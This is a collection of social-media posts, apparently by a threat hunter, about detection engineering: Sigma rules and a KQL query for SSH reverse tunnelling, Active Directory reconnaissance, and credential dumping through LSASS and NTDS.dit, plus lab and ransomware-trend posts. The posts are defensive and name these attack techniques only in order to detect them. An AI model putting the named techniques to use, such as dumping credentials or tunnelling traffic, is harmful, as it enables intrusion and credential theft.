Ayush Anand

Ever seen ssh.exe on a workstation and ignored it? Attackers abuse SSH remote tunneling to hide lateral movement and proxy traffic through the victim host. - Simple Sigma rule "Port Forwarding Activity Via SSH.EXE" - Correlating process and network events in MDE can expose the activity inside the tunnel.

Sigma rules to detect the discover recon cmds: - Potential Recon Activity Via Nltest.EXE - Group Membership Reconnaissance Via Whoami.EXE - Suspicious Group And Account Reconnaissance Activity Using Net.EXE youtu.be/4xpP2yLYNoE

nltest, whoami, net.exe. Individually normal. Together within seconds? That pattern often shows pre-ransomware AD discovery. I simulated it with Adaptix C2 and watched Sigma alerts fire in Elastic. Process tree tells the real story. Breakdown in the lab video. 👇

@Kostastsale Congratulations 🎊

Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/introduci…

Still converting Sigma rules to Elastic one by one? 😵‍💫 Here’s how I batch-converted entire rule packs into Kibana NDJSON in one shot. 🔹 sigma-cli setup 🔹 Understanding targets + pipelines 🔹 Using the elasticsearch backend 🔹 Exporting rules to NDJSON securityinbits.com/detection-engi…

@nas_bench KQL Query: DeviceNetworkEvents | where Timestamp > ago(1h) | where InitiatingProcessFileName =~ "ssh.exe" | where InitiatingProcessCommandLine contains "-R" | order by Timestamp asc

Sigma rule: github.com/SigmaHQ/sigma/… Thanks to @nas_bench

Ever seen ssh.exe on a workstation and ignored it? Attackers abuse SSH remote tunneling to hide lateral movement and proxy traffic through the victim host. - Simple Sigma rule "Port Forwarding Activity Via SSH.EXE" - Correlating process and network events in MDE can expose the activity inside the tunnel.

@HALNine9sRel1k Agree, there will be false positive. But we can tune those based on the remote IP.

Not *always* true...

@Manrodmar999 Thank you 😊

@Securityinbits Excelente!

New blog: Using LLMs the right way for malware analysis 💡Tips for building an autonomous AI analysis lab on a 12 yo laptop and getting stuff done faster without loss of accuracy. blog.gdatasoftware.com/2026/03/38381-…

Think those AD discovery commands are just admin noise? That’s how Akira slips in.👀 I mapped common discovery cmds + classic LSASS dump via comsvcs.dll into focused Sigma rules. 6 detections that surface hands-on-keyboard before encryption starts.

@I_Am_Jakoby Congratulations 🎊, happy for u

My 3rd and final stage of the job interview is tomorrow Spoiler alert: I already know im getting the job What does that mean for you guys? If you guessed that it means I'll be releasing all my powershell for hackers courses for free you are correct. Im proud of you. I dont care about being rich. I wanna make sure my house is never in danger of being in foreclosure again, and I want to be able to spoil my 33 cats! Nothing else matters, and this job will guarantee both of those things. Ive never been happier in my life. not to mention i currently have 2 github and 2 microsoft bounties in triage and i stand to make some decent money im blessed, and everyone should have access to education. This has always been the dream

@vxunderground Now someone will publish an article claiming AI boosted threat actor productivity and speed by 1000%. 😀

Sigh Threat Actors are using AI to do blog posts on Threat Actor forums. You can immediately tell by the grammar, the segments (what it does, how the chain works), and the chronic usage of em dash.

I wanted to know which ransomware TTPs defenders should actually prioritize. So I analyzed a ransomware. live dataset (unique victim per group). Result 👇 2025: 1. Qilin 2. Akira 3. Cl0p 4. Play 2026 YTD: Qilin still #1 Akira dropped to #4

Reading the same @TheDFIRReport again & again to understand for my upcoming YT video. Drew my first Excalidraw diagram inspired by @fr0gger_ -> Visual Threat Intelligence book - game changer for understanding & explaining attack chains clearly. Next time I’m starting with visuals right away 😀

Sigma rule: github.com/Securityinbits… MS Blog: microsoft.com/en-us/security…

Saw Microsoft's blog on active SolarWinds Web Help Desk exploitation. Attackers dumping NTDS.dit... using print.exe Wrote a simple Sigma rule → tested in my Elastic lab Fires clean on the LOLBin abuse ✅ Detect this variant + similar print.exe abuse: Sigma rule 👇